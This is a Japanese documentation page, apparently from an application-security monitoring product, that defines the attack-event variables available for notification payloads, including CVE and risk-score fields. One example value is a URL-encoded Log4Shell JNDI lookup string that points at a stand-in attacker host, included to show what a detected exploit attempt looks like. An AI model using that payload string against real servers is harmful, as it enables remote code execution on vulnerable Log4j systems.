[アクション名（Action Name）] には特殊文字を使用しないでください。

ペイロードは有効な JSON である必要があります。[事前定義の変数（Predefined Variables）] の内容をコピーして、[エディタ（Editor）] にその変数を貼り付けます。たとえば、[Event Type] に [Attack] を選択した場合、[Add Payload] をクリックしたときに、攻撃イベントに関連する変数を選択できます。

攻撃変数：

フィールド	説明	値の例
$attack.id	攻撃の一意の識別子	"SQL_INJECTION_001"
$attack.status	攻撃の現在のステータス	"ACTIVE"、"RESOLVED"、"INVESTIGATING"
$attack.source	攻撃の送信元または発生元	"External"、"Internal"、"Unknown"
$attack.outcome	攻撃の結果または成果	"BLOCKED"、"ALLOWED"、"PARTIALLY_BLOCKED"
$attack.types	検出された攻撃のタイプ	"SQL Injection"、"XSS"、"CSRF"
$attack.eventTrigger	攻撃の検出をトリガーしたイベント	"HTTP Request"、"Database Query"
$attack.lastDetected	攻撃が最後に検出された時点を示すタイムスタンプ。	"2023-10-15T14:30:00Z"
$attack.events	攻撃に関連する詳細なイベント。詳細については、以下の「攻撃イベント」の表を参照してください。	攻撃イベントの JSON 配列

$attack.events には、次のキーフィールドが含まれています。

フィールド	説明	値の例
$attack.events.eventType	攻撃中に検出されたアクティビティのタイプ	"SOCKET_RESOLVE"
$attack.events.attackType	特定の攻撃カテゴリが検出されました	"LOG4J"
$attack.events.timestamp	攻撃イベントが発生した時間	"2025-01-22T23:03:52Z"
$attack.events.applicationName	攻撃の影響を受けたアプリケーション	"ExpoitsTestApp"
$attack.events.tierName	攻撃の影響を受けた階層	"ExpoitsTestTier"
$attack.events.blocked	攻撃がブロックされたかどうかを示します	"true"、"false"
$attack.events.attackOutcome	イベントの結果	"EXPLOITED"、"ATTEMPTED"、"BLOCKED"、"OBSERVED"、"UNKNOWN"
$attack.events.stackTrace	攻撃の発生源であるスタックトレース	"java.lang.SecurityManager.checkConnect(...)"
$attack.events.clientAddress	要求を開始したクライアントの IP アドレス	"127.11.11.1"
$attack.events.clientPort	クライアントで使用されるポート	"40758"
$attack.events.serverAddress	要求を処理するサーバーの IP アドレス	"127.12.12.1"
$attack.events.serverPort	サーバーで使用されるポート	"8088"
$attack.events.webTransactionUrl	エクスプロイト試行に関与する完全な URL	"https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"
$attack.events.maliciousIpOut	イベント中に接続されたアウトバウンド IP アドレス	"192.0.2.123"
$attack.events.maliciousIpSourceOut	悪意のある IP が一致する送信元（存在する場合）	"10.1.2.45"
$attack.events.detailJson	構造化された技術メタデータ（クラス、ソケット、メソッドなど）	{"classname": "java.net.SocketPermission", ...}

攻撃イベントが脆弱性によって引き起こされた場合、$attack.events には次の追加フィールドが含まれる場合があります。

表 1. 脆弱性に関連した攻撃イベントのフィールド

フィールド	説明	値の例
$attack.events.vulnerableMethod	脆弱性がトリガーされたメソッド	"org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"
$attack.events.matchedCveName	一致した CVE の名前	"CVE-2021-44228"
$attack.events.cveId	一致した CVE の内部識別子
$attack.events.vulnerabilityInfo.cvePublishDate	CVE 公開日	"2021-12-10T10:10:01Z"
$attack.events.vulnerabilityInfo.cvssScore	CVSS リスクスコア（0 〜 10）	10
$attack.events.vulnerabilityInfo.cvssSeverity	CVSS に基づくシビラティレベル	"CRITICAL"
$attack.events.vulnerabilityInfo.library	関連する脆弱なライブラリ	"org.apache.logging.log4j:log4j-core"
$attack.events.vulnerabilityInfo.title	人間が判読可能な脆弱性についての説明	"Remote Code Execution (RCE)"
$attack.events.vulnerabilityInfo.kennaScore	Kenna Security のリスクスコア	100
$attack.events.vulnerabilityInfo.kennaActiveInternetBreach	脆弱性が積極的に不正利用されることが知られているかどうか	true、false
$attack.events.vulnerabilityInfo.kennaEasilyExploitable	脆弱性のエクスプロイトが容易かどうか	true、false
$attack.events.vulnerabilityInfo.kennaPredictedExploitable	予測モデルによるエクスプロイト可能性のアセスメント	true、false
$attack.events.vulnerabilityInfo.kennaPopularTarget	組織全体でよく狙われるターゲットかどうか	true、false

ServiceNow のペイロードの例：